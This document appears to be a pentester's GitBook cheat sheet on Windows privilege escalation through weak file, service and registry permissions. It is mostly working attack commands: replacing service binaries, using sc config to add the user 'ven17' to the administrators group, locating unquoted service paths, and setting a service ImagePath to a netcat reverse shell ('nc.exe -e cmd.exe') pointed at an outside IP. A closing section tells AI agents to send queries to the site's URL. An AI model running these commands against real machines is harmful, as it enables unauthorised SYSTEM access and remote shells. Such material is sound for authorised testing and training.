# Weak Permissions ## **Permissive File System ACLs** #### **Running SharpUp** * Tool: **SharpUp** from GhostPack to check for weak ACLs. ```powershell PS C:\> .\SharpUp.exe audit ``` * Example vulnerable service: * **Name:** **SecurityService** * **Path:** `"C:\Program Files (x86)\PCProtect\SecurityService.exe"` #### **Checking Permissions with ****`icacls`** ```powershell PS C:\> icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe" ``` * Output shows `Everyone` and `BUILTIN\Users` have `Full Control`. #### **Replacing Service Binary with malicious one** ```powershell C:\> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe" C:\> sc start SecurityService ``` * Replace with a malicious binary to gain SYSTEM privileges. ## **Weak Service Permissions** #### **Checking Modifiable Services with SharpUp** ```powershell C:\> SharpUp.exe audit ``` * Example vulnerable service: * **Name:** WindscribeService * **Path:** `"C:\Program Files (x86)\Windscribe\WindscribeService.exe"` #### **Checking Permissions with ****`accesschk`** ```powershell C:\> accesschk.exe /accepteula -quvcw WindscribeService ``` * `NT AUTHORITY\Authenticated Users` has `SERVICE_ALL_ACCESS` (full control). #### **Changing the Service Binary Path** ```powershell C:\> sc config WindscribeService binpath="cmd /c net localgroup administrators ven17 /add" ``` * Grants user `ven17` administrator rights. #### **Stopping & Starting the Service** ```powershell C:\> sc stop WindscribeService C:\> sc start WindscribeService ``` * Executes the new binary path. #### **Confirming Privilege Escalation** ```powershell C:\> net localgroup administrators ``` * Verify if `ven17` was added to the Administrators group. #### **Resetting the Binary Path (Cleanup)** ```powershell C:\> sc config WindscribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe" C:\> sc start WindscribeService C:\> sc query WindscribeService ``` ## **Unquoted Service Path** * If a service binary path is not enclosed in quotes, Windows may execute unintended binaries. * Example vulnerable service: ```plaintext C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe ``` * Windows may execute: * `C:\Program.exe` * `C:\Program Files\System.exe` #### **Finding Unquoted Service Paths** ```powershell C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ``` ## **Permissive Registry ACLs** #### **Checking for Weak Service ACLs in the Registry** ```powershell C:\> accesschk.exe /accepteula "ven17" -kvuqsw hklm\System\CurrentControlSet\services ``` * Example vulnerable service: **ModelManagerService** * Allows modification of the `ImagePath`. #### **Changing ****`ImagePath`**** with PowerShell** ```powershell PS C:\> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\ven17\Downloads\nc.exe -e cmd.exe 13.13.13.13 443" ``` * Executes Netcat shell upon service start. ## **Modifiable Registry Autorun Binaries** #### **Checking Startup Programs** ```powershell PS C:\> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl ``` * If the attacker can modify a startup binary, they can execute malicious code on user login. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://venator17.gitbook.io/bibliotheque/windows/privilege-escalation/misc/weak-permissions.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.